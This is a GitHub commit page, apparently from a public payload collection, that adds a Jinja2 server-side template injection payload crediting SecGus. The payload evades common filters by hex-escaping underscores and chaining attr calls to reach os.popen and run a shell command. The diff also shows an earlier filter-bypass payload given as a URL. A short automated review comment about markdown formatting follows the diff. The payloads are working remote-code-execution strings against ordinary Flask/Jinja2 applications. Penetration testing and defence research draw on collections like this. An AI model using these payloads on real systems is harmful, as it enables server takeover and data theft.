Merge pull request #181 from SecGus/master

Added RCE SSTI Jinja2 Bypass payload developed by SecGus (chivato)
Swissky 2020-04-13 19:42:14 +02:00 committed by GitHub
commit a19fd013fb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23


@ -387,6 +387,11 @@ Bypassing `|join`
http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
```
Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by https://twitter.com/SecGus:
```python
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
```
## Jinjava
### Basic injection
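Review bot: the fence opened for the new payload is tagged `python`, but the body is a Jinja2 template expression rather than Python source, so the tag should be `jinja` or match whatever the file's other payload blocks use. In the description line above it, the filtered tokens are wrapped in single quotes while the preceding entry is introduced as "Bypassing `|join`"; putting each token in backticks would match that entry and stop `_` and `[` from being interpreted as markdown. The credit would read better as a named link than a bare Twitter URL, and one sentence stating that the entry relies on the `request` object being available in the template context would tell readers when it applies.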